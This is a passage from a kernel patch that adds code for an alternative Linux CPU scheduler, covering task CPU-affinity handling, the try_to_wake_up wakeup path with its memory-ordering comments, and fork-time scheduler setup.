++ * task must not exit() & deallocate itself prematurely. The
++ * call is not atomic; no spinlocks may be held.
++ */
++static int __set_cpus_allowed_ptr(struct task_struct *p,
++				  const struct cpumask *new_mask, u32 flags)
++{
++	unsigned long irq_flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
++	rq = __task_access_lock(p, &lock);
++
++	return __set_cpus_allowed_ptr_locked(p, new_mask, flags, rq, lock, irq_flags);
++}
++
++int set_cpus_allowed_ptr(struct task_struct *p, const struct cpumask *new_mask)
++{
++	return __set_cpus_allowed_ptr(p, new_mask, 0);
++}
++EXPORT_SYMBOL_GPL(set_cpus_allowed_ptr);
++
++/*
++ * Change a given task's CPU affinity to the intersection of its current
++ * affinity mask and @subset_mask, writing the resulting mask to @new_mask
++ * and pointing @p->user_cpus_ptr to a copy of the old mask.
++ * If the resulting mask is empty, leave the affinity unchanged and return
++ * -EINVAL.
++ */
++static int restrict_cpus_allowed_ptr(struct task_struct *p,
++				     struct cpumask *new_mask,
++				     const struct cpumask *subset_mask)
++{
++	struct cpumask *user_mask = NULL;
++	unsigned long irq_flags;
++	raw_spinlock_t *lock;
++	struct rq *rq;
++	int err;
++
++	if (!p->user_cpus_ptr) {
++		user_mask = kmalloc(cpumask_size(), GFP_KERNEL);
++		if (!user_mask)
++			return -ENOMEM;
++	}
++
++	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
++	rq = __task_access_lock(p, &lock);
++
++	if (!cpumask_and(new_mask, &p->cpus_mask, subset_mask)) {
++		err = -EINVAL;
++		goto err_unlock;
++	}
++
++	/*
++	 * We're about to butcher the task affinity, so keep track of what
++	 * the user asked for in case we're able to restore it later on.
++	 */
++	if (user_mask) {
++		cpumask_copy(user_mask, p->cpus_ptr);
++		p->user_cpus_ptr = user_mask;
++	}
++
++	/*return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, &rf);*/
++	return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, lock, irq_flags);
++
++err_unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++	kfree(user_mask);
++	return err;
++}
++
++/*
++ * Restrict the CPU affinity of task @p so that it is a subset of
++ * task_cpu_possible_mask() and point @p->user_cpu_ptr to a copy of the
++ * old affinity mask. If the resulting mask is empty, we warn and walk
++ * up the cpuset hierarchy until we find a suitable mask.
++ */
++void force_compatible_cpus_allowed_ptr(struct task_struct *p)
++{
++	cpumask_var_t new_mask;
++	const struct cpumask *override_mask = task_cpu_possible_mask(p);
++
++	alloc_cpumask_var(&new_mask, GFP_KERNEL);
++
++	/*
++	 * __migrate_task() can fail silently in the face of concurrent
++	 * offlining of the chosen destination CPU, so take the hotplug
++	 * lock to ensure that the migration succeeds.
++	 */
++	cpus_read_lock();
++	if (!cpumask_available(new_mask))
++		goto out_set_mask;
++
++	if (!restrict_cpus_allowed_ptr(p, new_mask, override_mask))
++		goto out_free_mask;
++
++	/*
++	 * We failed to find a valid subset of the affinity mask for the
++	 * task, so override it based on its cpuset hierarchy.
++	 */
++	cpuset_cpus_allowed(p, new_mask);
++	override_mask = new_mask;
++
++out_set_mask:
++	if (printk_ratelimit()) {
++		printk_deferred("Overriding affinity for process %d (%s) to CPUs %*pbl\n",
++				task_pid_nr(p), p->comm,
++				cpumask_pr_args(override_mask));
++	}
++
++	WARN_ON(set_cpus_allowed_ptr(p, override_mask));
++out_free_mask:
++	cpus_read_unlock();
++	free_cpumask_var(new_mask);
++}
++
++static int
++__sched_setaffinity(struct task_struct *p, const struct cpumask *mask);
++
++/*
++ * Restore the affinity of a task @p which was previously restricted by a
++ * call to force_compatible_cpus_allowed_ptr(). This will clear (and free)
++ * @p->user_cpus_ptr.
++ *
++ * It is the caller's responsibility to serialise this with any calls to
++ * force_compatible_cpus_allowed_ptr(@p).
++ */
++void relax_compatible_cpus_allowed_ptr(struct task_struct *p)
++{
++	struct cpumask *user_mask = p->user_cpus_ptr;
++	unsigned long flags;
++
++	/*
++	 * Try to restore the old affinity mask. If this fails, then
++	 * we free the mask explicitly to avoid it being inherited across
++	 * a subsequent fork().
++	 */
++	if (!user_mask || !__sched_setaffinity(p, user_mask))
++		return;
++
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	user_mask = clear_user_cpus_ptr(p);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	kfree(user_mask);
++}
++
++#else /* CONFIG_SMP */
++
++static inline int select_task_rq(struct task_struct *p)
++{
++	return 0;
++}
++
++static inline int
++__set_cpus_allowed_ptr(struct task_struct *p,
++		       const struct cpumask *new_mask, u32 flags)
++{
++	return set_cpus_allowed_ptr(p, new_mask);
++}
++
++static inline bool rq_has_pinned_tasks(struct rq *rq)
++{
++	return false;
++}
++
++#endif /* !CONFIG_SMP */
++
++static void
++ttwu_stat(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq;
++
++	if (!schedstat_enabled())
++		return;
++
++	rq = this_rq();
++
++#ifdef CONFIG_SMP
++	if (cpu == rq->cpu) {
++		__schedstat_inc(rq->ttwu_local);
++		__schedstat_inc(p->stats.nr_wakeups_local);
++	} else {
++		/** Alt schedule FW ToDo:
++		 * How to do ttwu_wake_remote
++		 */
++	}
++#endif /* CONFIG_SMP */
++
++	__schedstat_inc(rq->ttwu_count);
++	__schedstat_inc(p->stats.nr_wakeups);
++}
++
++/*
++ * Mark the task runnable and perform wakeup-preemption.
++ */
++static inline void
++ttwu_do_wakeup(struct rq *rq, struct task_struct *p, int wake_flags)
++{
++	check_preempt_curr(rq);
++	WRITE_ONCE(p->__state, TASK_RUNNING);
++	trace_sched_wakeup(p);
++}
++
++static inline void
++ttwu_do_activate(struct rq *rq, struct task_struct *p, int wake_flags)
++{
++	if (p->sched_contributes_to_load)
++		rq->nr_uninterruptible--;
++
++	if (
++#ifdef CONFIG_SMP
++	    !(wake_flags & WF_MIGRATED) &&
++#endif
++	    p->in_iowait) {
++		delayacct_blkio_end(p);
++		atomic_dec(&task_rq(p)->nr_iowait);
++	}
++
++	activate_task(p, rq);
++	ttwu_do_wakeup(rq, p, 0);
++}
++
++/*
++ * Consider @p being inside a wait loop:
++ *
++ *   for (;;) {
++ *      set_current_state(TASK_UNINTERRUPTIBLE);
++ *
++ *      if (CONDITION)
++ *         break;
++ *
++ *      schedule();
++ *   }
++ *   __set_current_state(TASK_RUNNING);
++ *
++ * between set_current_state() and schedule(). In this case @p is still
++ * runnable, so all that needs doing is change p->state back to TASK_RUNNING in
++ * an atomic manner.
++ *
++ * By taking task_rq(p)->lock we serialize against schedule(), if @p->on_rq
++ * then schedule() must still happen and p->state can be changed to
++ * TASK_RUNNING. Otherwise we lost the race, schedule() has happened, and we
++ * need to do a full wakeup with enqueue.
++ *
++ * Returns: %true when the wakeup is done,
++ *          %false otherwise.
++ */
++static int ttwu_runnable(struct task_struct *p, int wake_flags)
++{
++	struct rq *rq;
++	raw_spinlock_t *lock;
++	int ret = 0;
++
++	rq = __task_access_lock(p, &lock);
++	if (task_on_rq_queued(p)) {
++		/* check_preempt_curr() may use rq clock */
++		update_rq_clock(rq);
++		ttwu_do_wakeup(rq, p, wake_flags);
++		ret = 1;
++	}
++	__task_access_unlock(p, lock);
++
++	return ret;
++}
++
++#ifdef CONFIG_SMP
++void sched_ttwu_pending(void *arg)
++{
++	struct llist_node *llist = arg;
++	struct rq *rq = this_rq();
++	struct task_struct *p, *t;
++	struct rq_flags rf;
++
++	if (!llist)
++		return;
++
++	/*
++	 * rq::ttwu_pending racy indication of out-standing wakeups.
++	 * Races such that false-negatives are possible, since they
++	 * are shorter lived that false-positives would be.
++	 */
++	WRITE_ONCE(rq->ttwu_pending, 0);
++
++	rq_lock_irqsave(rq, &rf);
++	update_rq_clock(rq);
++
++	llist_for_each_entry_safe(p, t, llist, wake_entry.llist) {
++		if (WARN_ON_ONCE(p->on_cpu))
++			smp_cond_load_acquire(&p->on_cpu, !VAL);
++
++		if (WARN_ON_ONCE(task_cpu(p) != cpu_of(rq)))
++			set_task_cpu(p, cpu_of(rq));
++
++		ttwu_do_activate(rq, p, p->sched_remote_wakeup ? WF_MIGRATED : 0);
++	}
++
++	rq_unlock_irqrestore(rq, &rf);
++}
++
++void send_call_function_single_ipi(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (!set_nr_if_polling(rq->idle))
++		arch_send_call_function_single_ipi(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++/*
++ * Queue a task on the target CPUs wake_list and wake the CPU via IPI if
++ * necessary. The wakee CPU on receipt of the IPI will queue the task
++ * via sched_ttwu_wakeup() for activation so the wakee incurs the cost
++ * of the wakeup instead of the waker.
++ */
++static void __ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	p->sched_remote_wakeup = !!(wake_flags & WF_MIGRATED);
++
++	WRITE_ONCE(rq->ttwu_pending, 1);
++	__smp_call_single_queue(cpu, &p->wake_entry.llist);
++}
++
++static inline bool ttwu_queue_cond(struct task_struct *p, int cpu)
++{
++	/*
++	 * Do not complicate things with the async wake_list while the CPU is
++	 * in hotplug state.
++	 */
++	if (!cpu_active(cpu))
++		return false;
++
++	/* Ensure the task will still be allowed to run on the CPU. */
++	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
++		return false;
++
++	/*
++	 * If the CPU does not share cache, then queue the task on the
++	 * remote rqs wakelist to avoid accessing remote data.
++	 */
++	if (!cpus_share_cache(smp_processor_id(), cpu))
++		return true;
++
++	if (cpu == smp_processor_id())
++		return false;
++
++	/*
++	 * If the wakee cpu is idle, or the task is descheduling and the
++	 * only running task on the CPU, then use the wakelist to offload
++	 * the task activation to the idle (or soon-to-be-idle) CPU as
++	 * the current CPU is likely busy. nr_running is checked to
++	 * avoid unnecessary task stacking.
++	 *
++	 * Note that we can only get here with (wakee) p->on_rq=0,
++	 * p->on_cpu can be whatever, we've done the dequeue, so
++	 * the wakee has been accounted out of ->nr_running.
++	 */
++	if (!cpu_rq(cpu)->nr_running)
++		return true;
++
++	return false;
++}
++
++static bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	if (__is_defined(ALT_SCHED_TTWU_QUEUE) && ttwu_queue_cond(p, cpu)) {
++		sched_clock_cpu(cpu); /* Sync clocks across CPUs */
++		__ttwu_queue_wakelist(p, cpu, wake_flags);
++		return true;
++	}
++
++	return false;
++}
++
++void wake_up_if_idle(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	rcu_read_lock();
++
++	if (!is_idle_task(rcu_dereference(rq->curr)))
++		goto out;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (is_idle_task(rq->curr))
++		resched_curr(rq);
++	/* Else CPU is not idle, do nothing here */
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++out:
++	rcu_read_unlock();
++}
++
++bool cpus_share_cache(int this_cpu, int that_cpu)
++{
++	if (this_cpu == that_cpu)
++		return true;
++
++	return per_cpu(sd_llc_id, this_cpu) == per_cpu(sd_llc_id, that_cpu);
++}
++#else /* !CONFIG_SMP */
++
++static inline bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	return false;
++}
++
++#endif /* CONFIG_SMP */
++
++static inline void ttwu_queue(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (ttwu_queue_wakelist(p, cpu, wake_flags))
++		return;
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++	ttwu_do_activate(rq, p, wake_flags);
++	raw_spin_unlock(&rq->lock);
++}
++
++/*
++ * Invoked from try_to_wake_up() to check whether the task can be woken up.
++ *
++ * The caller holds p::pi_lock if p != current or has preemption
++ * disabled when p == current.
++ *
++ * The rules of PREEMPT_RT saved_state:
++ *
++ *   The related locking code always holds p::pi_lock when updating
++ *   p::saved_state, which means the code is fully serialized in both cases.
++ *
++ *   The lock wait and lock wakeups happen via TASK_RTLOCK_WAIT. No other
++ *   bits set. This allows to distinguish all wakeup scenarios.
++ */
++static __always_inline
++bool ttwu_state_match(struct task_struct *p, unsigned int state, int *success)
++{
++	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)) {
++		WARN_ON_ONCE((state & TASK_RTLOCK_WAIT) &&
++			     state != TASK_RTLOCK_WAIT);
++	}
++
++	if (READ_ONCE(p->__state) & state) {
++		*success = 1;
++		return true;
++	}
++
++#ifdef CONFIG_PREEMPT_RT
++	/*
++	 * Saved state preserves the task state across blocking on
++	 * an RT lock.  If the state matches, set p::saved_state to
++	 * TASK_RUNNING, but do not wake the task because it waits
++	 * for a lock wakeup. Also indicate success because from
++	 * the regular waker's point of view this has succeeded.
++	 *
++	 * After acquiring the lock the task will restore p::__state
++	 * from p::saved_state which ensures that the regular
++	 * wakeup is not lost. The restore will also set
++	 * p::saved_state to TASK_RUNNING so any further tests will
++	 * not result in false positives vs. @success
++	 */
++	if (p->saved_state & state) {
++		p->saved_state = TASK_RUNNING;
++		*success = 1;
++	}
++#endif
++	return false;
++}
++
++/*
++ * Notes on Program-Order guarantees on SMP systems.
++ *
++ *  MIGRATION
++ *
++ * The basic program-order guarantee on SMP systems is that when a task [t]
++ * migrates, all its activity on its old CPU [c0] happens-before any subsequent
++ * execution on its new CPU [c1].
++ *
++ * For migration (of runnable tasks) this is provided by the following means:
++ *
++ *  A) UNLOCK of the rq(c0)->lock scheduling out task t
++ *  B) migration for t is required to synchronize *both* rq(c0)->lock and
++ *     rq(c1)->lock (if not at the same time, then in that order).
++ *  C) LOCK of the rq(c1)->lock scheduling in task
++ *
++ * Transitivity guarantees that B happens after A and C after B.
++ * Note: we only require RCpc transitivity.
++ * Note: the CPU doing B need not be c0 or c1
++ *
++ * Example:
++ *
++ *   CPU0            CPU1            CPU2
++ *
++ *   LOCK rq(0)->lock
++ *   sched-out X
++ *   sched-in Y
++ *   UNLOCK rq(0)->lock
++ *
++ *                                   LOCK rq(0)->lock // orders against CPU0
++ *                                   dequeue X
++ *                                   UNLOCK rq(0)->lock
++ *
++ *                                   LOCK rq(1)->lock
++ *                                   enqueue X
++ *                                   UNLOCK rq(1)->lock
++ *
++ *                   LOCK rq(1)->lock // orders against CPU2
++ *                   sched-out Z
++ *                   sched-in X
++ *                   UNLOCK rq(1)->lock
++ *
++ *
++ *  BLOCKING -- aka. SLEEP + WAKEUP
++ *
++ * For blocking we (obviously) need to provide the same guarantee as for
++ * migration. However the means are completely different as there is no lock
++ * chain to provide order. Instead we do:
++ *
++ *   1) smp_store_release(X->on_cpu, 0)   -- finish_task()
++ *   2) smp_cond_load_acquire(!X->on_cpu) -- try_to_wake_up()
++ *
++ * Example:
++ *
++ *   CPU0 (schedule)  CPU1 (try_to_wake_up) CPU2 (schedule)
++ *
++ *   LOCK rq(0)->lock LOCK X->pi_lock
++ *   dequeue X
++ *   sched-out X
++ *   smp_store_release(X->on_cpu, 0);
++ *
++ *                    smp_cond_load_acquire(&X->on_cpu, !VAL);
++ *                    X->state = WAKING
++ *                    set_task_cpu(X,2)
++ *
++ *                    LOCK rq(2)->lock
++ *                    enqueue X
++ *                    X->state = RUNNING
++ *                    UNLOCK rq(2)->lock
++ *
++ *                                          LOCK rq(2)->lock // orders against CPU1
++ *                                          sched-out Z
++ *                                          sched-in X
++ *                                          UNLOCK rq(2)->lock
++ *
++ *                    UNLOCK X->pi_lock
++ *   UNLOCK rq(0)->lock
++ *
++ *
++ * However; for wakeups there is a second guarantee we must provide, namely we
++ * must observe the state that lead to our wakeup. That is, not only must our
++ * task observe its own prior state, it must also observe the stores prior to
++ * its wakeup.
++ *
++ * This means that any means of doing remote wakeups must order the CPU doing
++ * the wakeup against the CPU the task is going to end up running on. This,
++ * however, is already required for the regular Program-Order guarantee above,
++ * since the waking CPU is the one issueing the ACQUIRE (smp_cond_load_acquire).
++ *
++ */
++
++/**
++ * try_to_wake_up - wake up a thread
++ * @p: the thread to be awakened
++ * @state: the mask of task states that can be woken
++ * @wake_flags: wake modifier flags (WF_*)
++ *
++ * Conceptually does:
++ *
++ *   If (@state & @p->state) @p->state = TASK_RUNNING.
++ *
++ * If the task was not queued/runnable, also place it back on a runqueue.
++ *
++ * This function is atomic against schedule() which would dequeue the task.
++ *
++ * It issues a full memory barrier before accessing @p->state, see the comment
++ * with set_current_state().
++ *
++ * Uses p->pi_lock to serialize against concurrent wake-ups.
++ *
++ * Relies on p->pi_lock stabilizing:
++ *  - p->sched_class
++ *  - p->cpus_ptr
++ *  - p->sched_task_group
++ * in order to do migration, see its use of select_task_rq()/set_task_cpu().
++ *
++ * Tries really hard to only take one task_rq(p)->lock for performance.
++ * Takes rq->lock in:
++ *  - ttwu_runnable()    -- old rq, unavoidable, see comment there;
++ *  - ttwu_queue()       -- new rq, for enqueue of the task;
++ *  - psi_ttwu_dequeue() -- much sadness :-( accounting will kill us.
++ *
++ * As a consequence we race really badly with just about everything. See the
++ * many memory barriers and their comments for details.
++ *
++ * Return: %true if @p->state changes (an actual wakeup was done),
++ *	   %false otherwise.
++ */
++static int try_to_wake_up(struct task_struct *p, unsigned int state,
++			  int wake_flags)
++{
++	unsigned long flags;
++	int cpu, success = 0;
++
++	preempt_disable();
++	if (p == current) {
++		/*
++		 * We're waking current, this means 'p->on_rq' and 'task_cpu(p)
++		 * == smp_processor_id()'. Together this means we can special
++		 * case the whole 'p->on_rq && ttwu_runnable()' case below
++		 * without taking any locks.
++		 *
++		 * In particular:
++		 *  - we rely on Program-Order guarantees for all the ordering,
++		 *  - we're serialized against set_special_state() by virtue of
++		 *    it disabling IRQs (this allows not taking ->pi_lock).
++		 */
++		if (!ttwu_state_match(p, state, &success))
++			goto out;
++
++		trace_sched_waking(p);
++		WRITE_ONCE(p->__state, TASK_RUNNING);
++		trace_sched_wakeup(p);
++		goto out;
++	}
++
++	/*
++	 * If we are going to wake up a thread waiting for CONDITION we
++	 * need to ensure that CONDITION=1 done by the caller can not be
++	 * reordered with p->state check below. This pairs with smp_store_mb()
++	 * in set_current_state() that the waiting thread does.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	smp_mb__after_spinlock();
++	if (!ttwu_state_match(p, state, &success))
++		goto unlock;
++
++	trace_sched_waking(p);
++
++	/*
++	 * Ensure we load p->on_rq _after_ p->state, otherwise it would
++	 * be possible to, falsely, observe p->on_rq == 0 and get stuck
++	 * in smp_cond_load_acquire() below.
++	 *
++	 * sched_ttwu_pending()			try_to_wake_up()
++	 *   STORE p->on_rq = 1			  LOAD p->state
++	 *   UNLOCK rq->lock
++	 *
++	 * __schedule() (switch to task 'p')
++	 *   LOCK rq->lock			  smp_rmb();
++	 *   smp_mb__after_spinlock();
++	 *   UNLOCK rq->lock
++	 *
++	 * [task p]
++	 *   STORE p->state = UNINTERRUPTIBLE	  LOAD p->on_rq
++	 *
++	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
++	 * __schedule().  See the comment for smp_mb__after_spinlock().
++	 *
++	 * A similar smb_rmb() lives in try_invoke_on_locked_down_task().
++	 */
++	smp_rmb();
++	if (READ_ONCE(p->on_rq) && ttwu_runnable(p, wake_flags))
++		goto unlock;
++
++#ifdef CONFIG_SMP
++	/*
++	 * Ensure we load p->on_cpu _after_ p->on_rq, otherwise it would be
++	 * possible to, falsely, observe p->on_cpu == 0.
++	 *
++	 * One must be running (->on_cpu == 1) in order to remove oneself
++	 * from the runqueue.
++	 *
++	 * __schedule() (switch to task 'p')	try_to_wake_up()
++	 *   STORE p->on_cpu = 1		  LOAD p->on_rq
++	 *   UNLOCK rq->lock
++	 *
++	 * __schedule() (put 'p' to sleep)
++	 *   LOCK rq->lock			  smp_rmb();
++	 *   smp_mb__after_spinlock();
++	 *   STORE p->on_rq = 0			  LOAD p->on_cpu
++	 *
++	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
++	 * __schedule().  See the comment for smp_mb__after_spinlock().
++	 *
++	 * Form a control-dep-acquire with p->on_rq == 0 above, to ensure
++	 * schedule()'s deactivate_task() has 'happened' and p will no longer
++	 * care about it's own p->state. See the comment in __schedule().
++	 */
++	smp_acquire__after_ctrl_dep();
++
++	/*
++	 * We're doing the wakeup (@success == 1), they did a dequeue (p->on_rq
++	 * == 0), which means we need to do an enqueue, change p->state to
++	 * TASK_WAKING such that we can unlock p->pi_lock before doing the
++	 * enqueue, such as ttwu_queue_wakelist().
++	 */
++	WRITE_ONCE(p->__state, TASK_WAKING);
++
++	/*
++	 * If the owning (remote) CPU is still in the middle of schedule() with
++	 * this task as prev, considering queueing p on the remote CPUs wake_list
++	 * which potentially sends an IPI instead of spinning on p->on_cpu to
++	 * let the waker make forward progress. This is safe because IRQs are
++	 * disabled and the IPI will deliver after on_cpu is cleared.
++	 *
++	 * Ensure we load task_cpu(p) after p->on_cpu:
++	 *
++	 * set_task_cpu(p, cpu);
++	 *   STORE p->cpu = @cpu
++	 * __schedule() (switch to task 'p')
++	 *   LOCK rq->lock
++	 *   smp_mb__after_spin_lock()          smp_cond_load_acquire(&p->on_cpu)
++	 *   STORE p->on_cpu = 1                LOAD p->cpu
++	 *
++	 * to ensure we observe the correct CPU on which the task is currently
++	 * scheduling.
++	 */
++	if (smp_load_acquire(&p->on_cpu) &&
++	    ttwu_queue_wakelist(p, task_cpu(p), wake_flags))
++		goto unlock;
++
++	/*
++	 * If the owning (remote) CPU is still in the middle of schedule() with
++	 * this task as prev, wait until it's done referencing the task.
++	 *
++	 * Pairs with the smp_store_release() in finish_task().
++	 *
++	 * This ensures that tasks getting woken will be fully ordered against
++	 * their previous state and preserve Program Order.
++	 */
++	smp_cond_load_acquire(&p->on_cpu, !VAL);
++
++	sched_task_ttwu(p);
++
++	cpu = select_task_rq(p);
++
++	if (cpu != task_cpu(p)) {
++		if (p->in_iowait) {
++			delayacct_blkio_end(p);
++			atomic_dec(&task_rq(p)->nr_iowait);
++		}
++
++		wake_flags |= WF_MIGRATED;
++		psi_ttwu_dequeue(p);
++		set_task_cpu(p, cpu);
++	}
++#else
++	cpu = task_cpu(p);
++#endif /* CONFIG_SMP */
++
++	ttwu_queue(p, cpu, wake_flags);
++unlock:
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++out:
++	if (success)
++		ttwu_stat(p, task_cpu(p), wake_flags);
++	preempt_enable();
++
++	return success;
++}
++
++static bool __task_needs_rq_lock(struct task_struct *p)
++{
++	unsigned int state = READ_ONCE(p->__state);
++
++	/*
++	 * Since pi->lock blocks try_to_wake_up(), we don't need rq->lock when
++	 * the task is blocked. Make sure to check @state since ttwu() can drop
++	 * locks at the end, see ttwu_queue_wakelist().
++	 */
++	if (state == TASK_RUNNING || state == TASK_WAKING)
++		return true;
++
++	/*
++	 * Ensure we load p->on_rq after p->__state, otherwise it would be
++	 * possible to, falsely, observe p->on_rq == 0.
++	 *
++	 * See try_to_wake_up() for a longer comment.
++	 */
++	smp_rmb();
++	if (p->on_rq)
++		return true;
++
++#ifdef CONFIG_SMP
++	/*
++	 * Ensure the task has finished __schedule() and will not be referenced
++	 * anymore. Again, see try_to_wake_up() for a longer comment.
++	 */
++	smp_rmb();
++	smp_cond_load_acquire(&p->on_cpu, !VAL);
++#endif
++
++	return false;
++}
++
++/**
++ * task_call_func - Invoke a function on task in fixed state
++ * @p: Process for which the function is to be invoked, can be @current.
++ * @func: Function to invoke.
++ * @arg: Argument to function.
++ *
++ * Fix the task in it's current state by avoiding wakeups and or rq operations
++ * and call @func(@arg) on it.  This function can use ->on_rq and task_curr()
++ * to work out what the state is, if required.  Given that @func can be invoked
++ * with a runqueue lock held, it had better be quite lightweight.
++ *
++ * Returns:
++ *   Whatever @func returns
++ */
++int task_call_func(struct task_struct *p, task_call_f func, void *arg)
++{
++	struct rq *rq = NULL;
++	struct rq_flags rf;
++	int ret;
++
++	raw_spin_lock_irqsave(&p->pi_lock, rf.flags);
++
++	if (__task_needs_rq_lock(p))
++		rq = __task_rq_lock(p, &rf);
++
++	/*
++	 * At this point the task is pinned; either:
++	 *  - blocked and we're holding off wakeups      (pi->lock)
++	 *  - woken, and we're holding off enqueue       (rq->lock)
++	 *  - queued, and we're holding off schedule     (rq->lock)
++	 *  - running, and we're holding off de-schedule (rq->lock)
++	 *
++	 * The called function (@func) can use: task_curr(), p->on_rq and
++	 * p->__state to differentiate between these states.
++	 */
++	ret = func(p, arg);
++
++	if (rq)
++		__task_rq_unlock(rq, &rf);
++
++	raw_spin_unlock_irqrestore(&p->pi_lock, rf.flags);
++	return ret;
++}
++
++/**
++ * cpu_curr_snapshot - Return a snapshot of the currently running task
++ * @cpu: The CPU on which to snapshot the task.
++ *
++ * Returns the task_struct pointer of the task "currently" running on
++ * the specified CPU.  If the same task is running on that CPU throughout,
++ * the return value will be a pointer to that task's task_struct structure.
++ * If the CPU did any context switches even vaguely concurrently with the
++ * execution of this function, the return value will be a pointer to the
++ * task_struct structure of a randomly chosen task that was running on
++ * that CPU somewhere around the time that this function was executing.
++ *
++ * If the specified CPU was offline, the return value is whatever it
++ * is, perhaps a pointer to the task_struct structure of that CPU's idle
++ * task, but there is no guarantee.  Callers wishing a useful return
++ * value must take some action to ensure that the specified CPU remains
++ * online throughout.
++ *
++ * This function executes full memory barriers before and after fetching
++ * the pointer, which permits the caller to confine this function's fetch
++ * with respect to the caller's accesses to other shared variables.
++ */
++struct task_struct *cpu_curr_snapshot(int cpu)
++{
++	struct task_struct *t;
++
++	smp_mb(); /* Pairing determined by caller's synchronization design. */
++	t = rcu_dereference(cpu_curr(cpu));
++	smp_mb(); /* Pairing determined by caller's synchronization design. */
++	return t;
++}
++
++/**
++ * wake_up_process - Wake up a specific process
++ * @p: The process to be woken up.
++ *
++ * Attempt to wake up the nominated process and move it to the set of runnable
++ * processes.
++ *
++ * Return: 1 if the process was woken up, 0 if it was already running.
++ *
++ * This function executes a full memory barrier before accessing the task state.
++ */
++int wake_up_process(struct task_struct *p)
++{
++	return try_to_wake_up(p, TASK_NORMAL, 0);
++}
++EXPORT_SYMBOL(wake_up_process);
++
++int wake_up_state(struct task_struct *p, unsigned int state)
++{
++	return try_to_wake_up(p, state, 0);
++}
++
++/*
++ * Perform scheduler related setup for a newly forked process p.
++ * p is forked by current.
++ *
++ * __sched_fork() is basic setup used by init_idle() too:
++ */
++static inline void __sched_fork(unsigned long clone_flags, struct task_struct *p)
++{
++	p->on_rq			= 0;
++	p->on_cpu			= 0;
++	p->utime			= 0;
++	p->stime			= 0;
++	p->sched_time			= 0;
++
++#ifdef CONFIG_SCHEDSTATS
++	/* Even if schedstat is disabled, there should not be garbage */
++	memset(&p->stats, 0, sizeof(p->stats));
++#endif
++
++#ifdef CONFIG_PREEMPT_NOTIFIERS
++	INIT_HLIST_HEAD(&p->preempt_notifiers);
++#endif
++
++#ifdef CONFIG_COMPACTION
++	p->capture_control = NULL;
++#endif
++#ifdef CONFIG_SMP
++	p->wake_entry.u_flags = CSD_TYPE_TTWU;
++#endif
++}
++
++/*
++ * fork()/clone()-time setup:
++ */
++int sched_fork(unsigned long clone_flags, struct task_struct *p)
++{
++	__sched_fork(clone_flags, p);
++	/*
++	 * We mark the process as NEW here. This guarantees that
++	 * nobody will actually run it, and a signal or other external
++	 * event cannot wake it up and insert it on the runqueue either.
++	 */
++	p->__state = TASK_NEW;
++
++	/*
++	 * Make sure we do not leak PI boosting priority to the child.
++	 */
++	p->prio = current->normal_prio;
++
++	/*
++	 * Revert to default priority/policy on fork if requested.
++	 */
++	if (unlikely(p->sched_reset_on_fork)) {
++		if (task_has_rt_policy(p)) {
++			p->policy = SCHED_NORMAL;
++			p->static_prio = NICE_TO_PRIO(0);
++			p->rt_priority = 0;
++		} else if (PRIO_TO_NICE(p->static_prio) < 0)
++			p->static_prio = NICE_TO_PRIO(0);
++
++		p->prio = p->normal_prio = p->static_prio;
++
++		/*
++		 * We don't need the reset flag anymore after the fork. It has
++		 * fulfilled its duty:
++		 */
++		p->sched_reset_on_fork = 0;
++	}
++
++#ifdef CONFIG_SCHED_INFO
++	if (unlikely(sched_info_on()))
++		memset(&p->sched_info, 0, sizeof(p->sched_info));
++#endif
++	init_task_preempt_count(p);
++
++	return 0;
++}
++
++void sched_cgroup_fork(struct task_struct *p, struct kernel_clone_args *kargs)
++{
++	unsigned long flags;
++	struct rq *rq;
++
++	/*
++	 * Because we're not yet on the pid-hash, p->pi_lock isn't strictly
++	 * required yet, but lockdep gets upset if rules are violated.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	/*
++	 * Share the timeslice between parent and child, thus the
++	 * total amount of pending timeslices in the system doesn't change,
++	 * resulting in more scheduling fairness.
++	 */
++	rq = this_rq();
++	raw_spin_lock(&rq->lock);
++
++	rq->curr->time_slice /= 2;
++	p->time_slice = rq->curr->time_slice;
++#ifdef CONFIG_SCHED_HRTICK
++	hrtick_start(rq, rq->curr->time_slice);
++#endif
++
++	if (p->time_slice < RESCHED_NS) {
++		p->time_slice = sched_timeslice_ns;
++		resched_curr(rq);
++	}
++	sched_task_fork(p, rq);
++	raw_spin_unlock(&rq->lock);
++
++	rseq_migrate(p);
++	/*
++	 * We're setting the CPU for the first time, we don't migrate,
++	 * so use __set_task_cpu().
++	 */
++	__set_task_cpu(p, smp_processor_id());
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++
++void sched_post_fork(struct task_struct *p)
++{
++}
++
++#ifdef CONFIG_SCHEDSTATS
++
++DEFINE_STATIC_KEY_FALSE(sched_schedstats);
++
++static void set_schedstats(bool enabled)
++{
++	if (enabled)
